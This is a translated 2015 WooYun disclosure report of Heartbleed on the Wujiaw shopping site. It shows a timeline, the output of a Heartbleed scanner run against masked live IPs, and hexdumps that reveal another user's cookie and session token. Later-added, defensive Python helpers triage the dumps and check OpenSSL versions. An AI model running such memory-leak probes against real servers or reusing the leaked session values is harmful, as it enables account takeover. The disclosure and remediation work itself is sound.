
Vulnerability summary

Defect ID: wooyun-2015-0149301

Title: Misconfigured service on Wujiaw (吾家网) leaks user information

Vendor: Beijing Liwujia E-commerce Co., Ltd. (北京利吾家电子商务有限公司)

Author: 路人甲 (anonymous contributor)

Submitted: 2015-10-26 18:16

Fixed: 2015-12-14 17:10

Published: 2015-12-14 17:10

Vulnerability type: system/service operations misconfiguration

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-10-26: details sent to the vendor, awaiting vendor handling
2015-10-30: vendor confirmed; details visible to the vendor only
2015-11-09: details opened to core white hats and domain experts
2015-11-19: details opened to regular white hats
2015-11-29: details opened to trainee white hats
2015-12-14: details opened to the public

Brief description:

Misconfigured service on Wujiaw (吾家网) leaks user information

Detailed description:

0x01: Target

http://**.**.**.**/

[screenshot: 4.png]

[screenshot: 3.png]

The hostname resolves to three IP addresses:

**.**.**.**

[screenshot: 6.png]

**.**.**.**/

**.**.**.**

[screenshot: 7png.png]

0x02: Heartbleed

The server is vulnerable to Heartbleed; a username and password ciphertext were captured from the leaked memory.

[screenshot: 5.png]

0x03: Friendly test; testing stopped at this point

Proof of vulnerability:

**.**.**.**


root@kali:~/Desktop/heartbleed# python ssltest.py **.**.**.**
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 5330
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 03 05 01 04 ....#...........
00e0: 03 04 01 03 03 03 01 02 03 02 01 02 02 01 01 00 ................
00f0: 00 00 13 00 11 00 00 0E 77 77 77 2E 77 75 6A 69 ........www.wuji
0100: 61 77 2E 63 6F 6D 41 6C 69 76 65 0D 0A 48 6F 73 **.**.**.**Alive..Hos
0110: 74 3A 20 77 77 77 2E 77 75 6A 69 61 77 2E 63 6F t: www.wujiaw.co
0120: 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 4D 6F m..User-Agent:Mo
0130: 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F zilla/5.0 (Windo
0140: 77 73 20 4E 54 20 36 2E 31 29 20 41 70 70 6C 65 ws NT 6.1) Apple
0150: 57 65 62 4B 69 74 2F 35 33 37 2E 31 20 28 4B 48 WebKit/537.1 (KH
0160: 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 TML, like Gecko)
0170: 20 43 68 72 6F 6D 65 2F 32 31 2E 30 2E 31 31 38 Chrome/21.0.118
0180: 30 2E 38 39 20 53 61 66 61 72 69 2F 35 33 37 2E 0.89 Safari/537.
0190: 31 3B 20 33 36 30 53 70 69 64 65 72 28 63 6F 6D 1; 360Spider(com
01a0: 70 61 74 69 62 6C 65 3B 20 48 61 6F 73 6F 75 53 patible; HaosouS
01b0: 70 69 64 65 72 3B 20 68 74 74 70 3A 2F 2F 77 77 pider; http://ww
01c0: 77 2E 68 61 6F 73 6F 75 2E 63 6F 6D 2F 68 65 6C **.**.**.**/hel
01d0: 70 2F 68 65 6C 70 5F 33 5F 32 2E 68 74 6D 6C 29 p/help_3_2.html)
01e0: 0D 0A 0D 0A 5B 96 FD D3 6C 75 1D B8 23 37 7C 31 ....[...lu..#7|1
01f0: F9 FD F3 43 87 6C E8 5C 07 07 07 07 07 07 07 07 ...C.l.\........
0200: A8 0B C3 8A A3 42 A0 6A 6C 4C AC F9 4D C8 64 9A .....B.jlL..M.d.
0210: 33 7C 34 D4 E4 EE 3A C6 84 1B 93 98 73 ED A3 C2 3|4...:.....s...
0220: 99 50 56 03 5F 68 74 6D 6C 3F 72 65 64 69 72 65 .PV._html?redire
0230: 63 74 55 72 6C 3D 68 74 74 70 73 3A 2F 2F 31 30 ctUrl=https://10
0240: 31 2E 32 35 31 2E 32 32 37 2E 36 31 2F 0D 0A 41 **.**.**.**/..A
0250: 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 ccept-Encoding:
0260: 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 2C 20 73 gzip, deflate, s
0270: 64 63 68 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 dch..Accept-Lang
0280: 75 61 67 65 3A 20 7A 68 2D 43 4E 2C 7A 68 3B 71 uage: zh-CN,zh;q
0290: 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A 20 43 4E =0.8..Cookie: CN
02a0: 5A 5A 44 41 54 41 35 37 36 38 35 39 34 3D 63 6E ZZDATA5768594=cn
02b0: 7A 7A 5F 65 69 64 25 33 44 31 36 39 35 31 31 34 zz_eid%3D1695114
02c0: 37 39 39 2D 31 34 34 35 37 34 34 34 35 35 2D 25 799-1445744455-%
02d0: 32 36 6E 74 69 6D 65 25 33 44 31 34 34 35 37 34 26ntime%3D144574
02e0: 34 34 35 35 3B 20 74 6F 6B 65 6E 3D 37 61 64 37 4455; token=7ad7
02f0: 38 65 39 31 2D 34 32 61 36 2D 34 62 39 37 2D 39 8e91-42a6-4b97-9
0300: 39 34 65 2D 31 31 65 39 35 64 65 61 32 33 37 34 94e-11e95dea2374
0310: 0D 0A 0D 0A 44 CB 51 95 84 FA AD FD FD 17 51 B7 ....D.Q.......Q.
0320: 98 3B 6F B8 76 5A 64 79 59 49 33 4F 59 62 57 4D .;o.vZdyYI3OYbWM
0330: 4F 42 4D 51 46 31 46 73 49 49 53 6B 39 25 32 46 OBMQF1FsIISk9%2F
0340: 25 32 46 75 53 48 76 47 59 51 71 4D 61 73 64 71 %2FuSHvGYQqMasdq
0350: 6B 56 57 55 6D 57 79 57 4E 50 4B 66 59 25 32 46 kVWUmWyWNPKfY%2F
0360: 37 46 6A 36 55 75 56 25 32 42 66 7A 25 32 42 70 7Fj6UuV%2Bfz%2Bp
0370: 69 47 7A 52 38 48 67 25 32 46 72 50 71 52 46 69 iGzR8Hg%2FrPqRFi
0380: 4C 79 71 65 7A 63 42 51 47 6B 76 79 41 6C 25 32 LyqezcBQGkvyAl%2
0390: 42 6C 6A 31 37 62 46 4B 48 62 46 67 41 65 7A 64 Blj17bFKHbFgAezd
03a0: 6A 4A 4B 74 33 45 76 37 52 54 49 48 66 39 5A 70 jJKt3Ev7RTIHf9Zp
03b0: 36 4B 49 4A 31 54 56 64 32 33 6A 4B 41 6B 4D 25 6KIJ1TVd23jKAkM%
03c0: 32 42 59 55 25 33 44 0A CB 3D 8D FA 3A 38 31 4A 2BYU%3D..=..:81J
03d0: FB 7D 1A 64 8C 19 91 00 00 00 00 00 00 00 00 00 .}.d............

https://10**.**.**.**


root@kali:~/Desktop/heartbleed# python ssltest.py 10**.**.**.**
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 66
... received message: type = 22, ver = 0302, length = 5330
... received message: type = 22, ver = 0302, length = 331
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 03 05 01 04 ....#...........
00e0: 03 04 01 03 03 03 01 02 03 02 01 02 02 01 01 00 ................
00f0: 00 00 13 00 11 00 00 0E 77 77 77 2E 77 75 6A 69 ........www.wuji
0100: 61 77 2E 63 6F 6D 41 6C 69 76 65 0D 0A 48 6F 73 **.**.**.**Alive..Hos
0110: 74 3A 20 77 77 77 2E 77 75 6A 69 61 77 2E 63 6F t: www.wujiaw.co
0120: 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 4D 6F m..User-Agent:Mo
0130: 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F zilla/5.0 (Windo
0140: 77 73 20 4E 54 20 36 2E 31 29 20 41 70 70 6C 65 ws NT 6.1) Apple
0150: 57 65 62 4B 69 74 2F 35 33 37 2E 31 20 28 4B 48 WebKit/537.1 (KH
0160: 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 TML, like Gecko)
0170: 20 43 68 72 6F 6D 65 2F 32 31 2E 30 2E 31 31 38 Chrome/21.0.118
0180: 30 2E 38 39 20 53 61 66 61 72 69 2F 35 33 37 2E 0.89 Safari/537.
0190: 31 3B 20 33 36 30 53 70 69 64 65 72 28 63 6F 6D 1; 360Spider(com
01a0: 70 61 74 69 62 6C 65 3B 20 48 61 6F 73 6F 75 53 patible; HaosouS
01b0: 70 69 64 65 72 3B 20 68 74 74 70 3A 2F 2F 77 77 pider; http://ww
01c0: 77 2E 68 61 6F 73 6F 75 2E 63 6F 6D 2F 68 65 6C **.**.**.**/hel
01d0: 70 2F 68 65 6C 70 5F 33 5F 32 2E 68 74 6D 6C 29 p/help_3_2.html)
01e0: 0D 0A 0D 0A 5B 96 FD D3 6C 75 1D B8 23 37 7C 31 ....[...lu..#7|1
01f0: F9 FD F3 43 87 6C E8 5C 07 07 07 07 07 07 07 07 ...C.l.\........
0200: A8 0B C3 8A A3 42 A0 6A 6C 4C AC F9 4D C8 64 9A .....B.jlL..M.d.
0210: 33 7C 34 D4 E4 EE 3A C6 84 1B 93 98 73 ED A3 C2 3|4...:.....s...
0220: 99 50 56 03 5F 68 74 6D 6C 3F 72 65 64 69 72 65 .PV._html?redire
0230: 63 74 55 72 6C 3D 68 74 74 70 73 3A 2F 2F 31 30 ctUrl=https://10
0240: 31 2E 32 35 31 2E 32 32 37 2E 36 31 2F 0D 0A 41 **.**.**.**/..A
0250: 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20 ccept-Encoding:
0260: 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 2C 20 73 gzip, deflate, s
0270: 64 63 68 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 dch..Accept-Lang
0280: 75 61 67 65 3A 20 7A 68 2D 43 4E 2C 7A 68 3B 71 uage: zh-CN,zh;q
0290: 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A 20 43 4E =0.8..Cookie: CN
02a0: 5A 5A 44 41 54 41 35 37 36 38 35 39 34 3D 63 6E ZZDATA5768594=cn
02b0: 7A 7A 5F 65 69 64 25 33 44 31 36 39 35 31 31 34 zz_eid%3D1695114
02c0: 37 39 39 2D 31 34 34 35 37 34 34 34 35 35 2D 25 799-1445744455-%
02d0: 32 36 6E 74 69 6D 65 25 33 44 31 34 34 35 37 34 26ntime%3D144574
02e0: 34 34 35 35 3B 20 74 6F 6B 65 6E 3D 37 61 64 37 4455; token=7ad7
02f0: 38 65 39 31 2D 34 32 61 36 2D 34 62 39 37 2D 39 8e91-42a6-4b97-9
0300: 39 34 65 2D 31 31 65 39 35 64 65 61 32 33 37 34 94e-11e95dea2374
0310: 0D 0A 0D 0A 44 CB 51 95 84 FA AD FD FD 17 51 B7 ....D.Q.......Q.
0320: 98 3B 6F B8 76 5A 64 79 59 49 33 4F 59 62 57 4D .;o.vZdyYI3OYbWM
0330: 4F 42 4D 51 46 31 46 73 49 49 53 6B 39 25 32 46 OBMQF1FsIISk9%2F
0340: 25 32 46 75 53 48 76 47 59 51 71 4D 61 73 64 71 %2FuSHvGYQqMasdq
0350: 6B 56 57 55 6D 57 79 57 4E 50 4B 66 59 25 32 46 kVWUmWyWNPKfY%2F
0360: 37 46 6A 36 55 75 56 25 32 42 66 7A 25 32 42 70 7Fj6UuV%2Bfz%2Bp
0370: 69 47 7A 52 38 48 67 25 32 46 72 50 71 52 46 69 iGzR8Hg%2FrPqRFi
0380: 4C 79 71 65 7A 63 42 51 47 6B 76 79 41 6C 25 32 LyqezcBQGkvyAl%2
0390: 42 6C 6A 31 37 62 46 4B 48 62 46 67 41 65 7A 64 Blj17bFKHbFgAezd
03a0: 6A 4A 4B 74 33 45 76 37 52 54 49 48 66 39 5A 70 jJKt3Ev7RTIHf9Zp
03b0: 36 4B 49 4A 31 54 56 64 32 33 6A 4B 41 6B 4D 25 6KIJ1TVd23jKAkM%
03c0: 32 42 59 55 25 33 44 0A CB 3D 8D FA 3A 38 31 4A 2BYU%3D..=..:81J
03d0: FB 7D 1A 64 8C 19 91 00 00 00 00 00 00 00 00 00 .}.d............
03e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
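
The dumps above show the Heartbleed signature as a defender sees it: a heartbeat response (message type 0x02, first byte of the dump) declaring a 16384-byte payload, followed by memory contents that include another client's Host header, User-Agent, Cookie and session token. The Python helper below is an added example, not part of this report or of the ssltest.py tool: it rebuilds the raw bytes from a dump in this output format, separates the three-byte heartbeat header from the leaked payload, and carves HTTP header lines out of the payload so the site owner can see which credentials and sessions need revoking. The sample dump it parses is constructed for the example, not captured from any host; the header-carving regex is a heuristic that can also pick up URL fragments such as "https://", so treat its output as a starting point for triage.

```python
"""Triage a Heartbleed hexdump in the format printed by the ssltest.py-style
scanner shown above. Added example; the sample dump below is constructed, not
captured from any real host."""
import re
from dataclasses import dataclass, field

# One dump line: "0010: 61 6D ... 74 ample..Cookie: t". Only the hex columns are
# decoded; the ASCII rendering on the right is ignored. Assumes at most 16
# bytes per line, as the scanner prints.
DUMP_LINE = re.compile(r"^\s*([0-9A-Fa-f]+):((?:\s+[0-9A-Fa-f]{2}){1,16})")

# HTTP request header lines: "Name: value\r\n" (heuristic; may also match
# "https://..." fragments inside leaked URLs).
HEADER_LINE = re.compile(r"([A-Za-z][A-Za-z0-9-]*):[ \t]*([^\r\n]*)\r\n")

# Header fields whose values are credentials or session material.
SENSITIVE_HEADERS = {"cookie", "authorization", "set-cookie", "x-auth-token"}

# Constructed sample in the scanner's output format. Byte 0 is the TLS
# heartbeat message type (0x02 = response), bytes 1-2 the declared payload
# length (0x4000 = 16384), the rest is whatever the server's memory held.
SAMPLE_DUMP = """\
Received heartbeat response:
0000: 02 40 00 48 6F 73 74 3A 20 73 68 6F 70 2E 65 78 .@.Host: shop.ex
0010: 61 6D 70 6C 65 0D 0A 43 6F 6F 6B 69 65 3A 20 74 ample..Cookie: t
0020: 6F 6B 65 6E 3D 64 65 61 64 62 65 65 66 0D 0A 0D oken=deadbeef...
0030: 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
"""


@dataclass
class Triage:
    msg_type: int          # 2 means heartbeat response
    declared_len: int      # payload length claimed in the heartbeat header
    payload_len: int       # bytes actually present in the dump
    headers: dict = field(default_factory=dict)
    leaked_secrets: list = field(default_factory=list)


def parse_dump(text: str) -> bytes:
    """Rebuild the raw bytes from the hex columns of a dump."""
    out = bytearray()
    for line in text.splitlines():
        m = DUMP_LINE.match(line)
        if m:
            out.extend(bytes.fromhex(m.group(2)))
    return bytes(out)


def triage(raw: bytes) -> Triage:
    """Split the heartbeat header from the leaked payload and carve HTTP
    headers out of it so the owner knows which sessions to revoke."""
    if len(raw) < 3:
        raise ValueError("dump too short to contain a heartbeat header")
    msg_type = raw[0]
    declared_len = int.from_bytes(raw[1:3], "big")
    payload = raw[3:]
    # latin-1 maps every byte to one code point, so binary garbage never
    # raises and the regex still finds ASCII header lines inside it.
    text = payload.decode("latin-1")
    headers = dict(HEADER_LINE.findall(text))
    leaked = [name for name in headers if name.lower() in SENSITIVE_HEADERS]
    return Triage(msg_type, declared_len, len(payload), headers, leaked)


if __name__ == "__main__":
    result = triage(parse_dump(SAMPLE_DUMP))
    print(f"type={result.msg_type} declared={result.declared_len} "
          f"present={result.payload_len}")
    for name in result.leaked_secrets:
        print(f"leaked {name}: {result.headers[name]}")
```

Run against the dumps in this report, the same carving recovers the Host, User-Agent and Cookie lines (including the `token=` value) visible in the ASCII column, which is why the remediation has to include invalidating active sessions and reissuing the certificate, not only upgrading the library.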

Fix recommendation:

Upgrade OpenSSL
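
To check whether an upgrade actually happened, the banner from `openssl version` is the first thing an operator looks at. The Python helper below is an added example, not part of this report: it classifies a banner against the upstream affected range (OpenSSL 1.0.1 through 1.0.1f and 1.0.2-beta1 are affected; 1.0.1g and 1.0.2-beta2 fixed it; the 1.0.0 and 0.9.8 branches never carried the heartbeat code). It deliberately reports "affected-upstream" rather than "vulnerable", because distributions backport the fix without changing the version letter, so a matching banner means "confirm via the package changelog or a live test", not "still exploitable". The `local_openssl_status` wrapper simply runs the locally installed binary.

```python
"""Classify an `openssl version` banner against the Heartbleed-affected
range. Added example, not part of the original report."""
import re
import subprocess

# "OpenSSL 1.0.1e 11 Feb 2013", "OpenSSL 1.0.2-beta1 24 Feb 2014", ...
VERSION_RE = re.compile(r"OpenSSL (\d+)\.(\d+)\.(\d+)([a-z]*)(?:-beta(\d+))?")


def heartbleed_status(banner: str) -> str:
    """Return 'affected-upstream', 'not-affected' or 'unknown'.

    Upstream, CVE-2014-0160 affects OpenSSL 1.0.1 through 1.0.1f and
    1.0.2-beta1; 1.0.1g and 1.0.2-beta2 fixed it, and the 1.0.0 and 0.9.8
    branches never had the heartbeat code. 'affected-upstream' is not
    'vulnerable': distributions backport the fix without bumping the letter
    (a patched Ubuntu build still reports 1.0.1e), so a matching banner means
    "confirm via the package changelog", not "exploitable".
    """
    m = VERSION_RE.search(banner)
    if not m:
        return "unknown"
    release = tuple(int(m.group(i)) for i in (1, 2, 3))
    letter, beta = m.group(4), m.group(5)
    if release == (1, 0, 1) and letter <= "f":
        return "affected-upstream"        # 1.0.1 .. 1.0.1f
    if release == (1, 0, 2) and beta == "1":
        return "affected-upstream"        # 1.0.2-beta1 only
    return "not-affected"                 # 1.0.1g+, 1.0.2-beta2+, other branches


def local_openssl_status() -> str:
    """Run the locally installed openssl binary and classify its banner."""
    try:
        banner = subprocess.run(["openssl", "version"], capture_output=True,
                                text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return "unknown"
    return heartbleed_status(banner)


if __name__ == "__main__":
    print(local_openssl_status())
```

Because a statically linked or bundled OpenSSL (in a load balancer, an appliance, or a vendored library) will not show up in the system banner, the version check belongs alongside a service-level test and a restart of every process that loaded the old library.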

Copyright notice: when reposting, credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-30 17:08

Vendor reply:

No direct handling channel with the site's operating organisation has been established yet; awaiting claim.

Latest status:

None